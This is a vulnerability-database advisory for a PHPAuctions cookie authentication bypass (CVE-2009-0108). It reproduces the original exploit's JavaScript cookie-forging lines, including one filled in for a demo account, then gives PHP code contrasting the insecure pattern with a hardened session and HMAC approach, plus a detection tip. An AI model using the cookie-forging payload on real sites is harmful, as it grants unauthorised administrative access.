PHPAuctions Cookie Authentication Bypass Vulnerability

Vulnerability ID: 1117193
Vulnerability type: Permission and access control
Published: 2009-01-05
Updated: 2009-01-29
CVE: CVE-2009-0108
CNNVD-ID: CNNVD-200901-097
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/7674
https://cxsecurity.com/issue/WLB-2009010146
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-097
|Vulnerability details
PHPAuctions is a PHP-based web application. PHPAuctions (also known as PHPAuctionSystem) has a permission and access control vulnerability: the application derives the logged-in identity from values carried in client cookies. A remote attacker can bypass authentication and gain administrative access by supplying modified (1) PHPAUCTION_RM_ID, (2) PHPAUCTION_RM_NAME, (3) PHPAUCTION_RM_USERNAME, or (4) PHPAUCTION_RM_EMAIL cookies.
|Exploit
[~] PHPAuctionSystem Insecure Cookie Handling Vuln.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 05.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0TE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] MOST IMPORTANT N0TE: whoever hacks the demos, let them be a ball ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

javascript:document.cookie = "PHPAUCTION_RM_ID=[ID]; path=/"; document.cookie = "PHPAUCTION_RM_NAME=[Real_name]; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=[User_name]; path=/"; document.cookie = "PHPAUCTION_RM_EMAIL=[email]; path=/";

exp for demo: ( username: sallama )

javascript:document.cookie = "PHPAUCTION_RM_ID=47; path=/"; document.cookie = "PHPAUCTION_RM_NAME=salla; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=sallama; path=/"; document.cookie = "PHPAUCTION_RM_EMAIL=trt-turk%40hotmail.com; path=/";


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-05]
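The root cause described above is a general one: any identity value that the client sends back in a cookie is attacker-controlled, so reading a user id or username out of `$_COOKIE` amounts to letting the client choose who it is. The following is an added illustration, not PHPAuctions' own code: the anti-pattern the advisory describes, placed beside a hardened equivalent that keeps identity in a server-side session and, where a persistent login is genuinely needed, makes the cookie unforgeable with an HMAC. The cookie names are the ones from the advisory; the `users` table layout, `$db`, and every function name are hypothetical.

```php
<?php
// Added example (not the project's code). Cookie names come from the advisory;
// the database schema and function names are hypothetical.

// --- Anti-pattern: identity taken straight from client-controlled cookies ------
// Whatever the browser sends in the Cookie: header can be set by the user,
// so this function trusts the client to declare its own user id and name.
function current_user_insecure(): ?array
{
    if (!isset($_COOKIE['PHPAUCTION_RM_ID'])) {
        return null;
    }
    return [
        'id'       => (int) $_COOKIE['PHPAUCTION_RM_ID'],
        'name'     => $_COOKIE['PHPAUCTION_RM_NAME']     ?? '',
        'username' => $_COOKIE['PHPAUCTION_RM_USERNAME'] ?? '',
        'email'    => $_COOKIE['PHPAUCTION_RM_EMAIL']    ?? '',
    ];
}

// --- Hardened: identity lives server-side; the cookie is only an opaque handle --
function secure_session_start(): void
{
    session_set_cookie_params([
        'httponly' => true,   // not readable via document.cookie
        'secure'   => true,   // sent over TLS only
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Called once, after the password check succeeds (hypothetical $db and schema).
function login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare(
        'SELECT id, password_hash FROM users WHERE username = ?'
    );
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }
    session_regenerate_id(true);              // defeat session fixation
    $_SESSION['user_id'] = (int) $row['id'];  // the only value trusted later
    return true;
}

// On every request the user record (including admin flags) is re-read from the
// database using the server-side session, never from anything the client sent.
function current_user(PDO $db): ?array
{
    if (empty($_SESSION['user_id'])) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT id, name, username, email, is_admin FROM users WHERE id = ?'
    );
    $stmt->execute([$_SESSION['user_id']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// If a persistent "remember me" cookie is really required, bind its contents to
// a server secret the client never sees. Format: "<userId>|<expires>|<hmac>".
function make_remember_cookie(int $userId, int $expires, string $secret): string
{
    $payload = $userId . '|' . $expires;
    return $payload . '|' . hash_hmac('sha256', $payload, $secret);
}

// Returns the user id only if the MAC verifies and the token has not expired.
function verify_remember_cookie(string $cookie, string $secret): ?int
{
    $parts = explode('|', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$userId, $expires, $mac] = $parts;
    $expected = hash_hmac('sha256', $userId . '|' . $expires, $secret);
    // hash_equals() is a constant-time comparison; a tampered id or expiry
    // changes the expected MAC, so the forged cookie is rejected.
    if (!hash_equals($expected, $mac) || (int) $expires < time()) {
        return null;
    }
    return (int) $userId;
}
```

Two design points matter here. First, the hardened path never copies name, username, email or admin status into a cookie at all; those are looked up from the database on each request, so a client that edits its cookies changes nothing. Second, even the signed "remember me" cookie carries only an id and an expiry, and the check uses `hash_equals()` rather than `==` so that MAC comparison does not leak timing information. From a detection standpoint, a session whose cookie-declared identity does not match any prior successful login for that session, or a sudden change of `PHPAUCTION_RM_ID` within one client session, is the signal to log and alert on.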
|References

Source: BID
Name: 33120
Link: http://www.securityfocus.com/bid/33120
Source: MILW0RM
Name: 7674
Link: http://www.milw0rm.com/exploits/7674
Source: SREASON
Name: 4891
Link: http://securityreason.com/securityalert/4891
Source: SECUNIA
Name: 33331
Link: http://secunia.com/advisories/33331
Source: OSVDB
Name: 51146
Link: http://osvdb.org/51146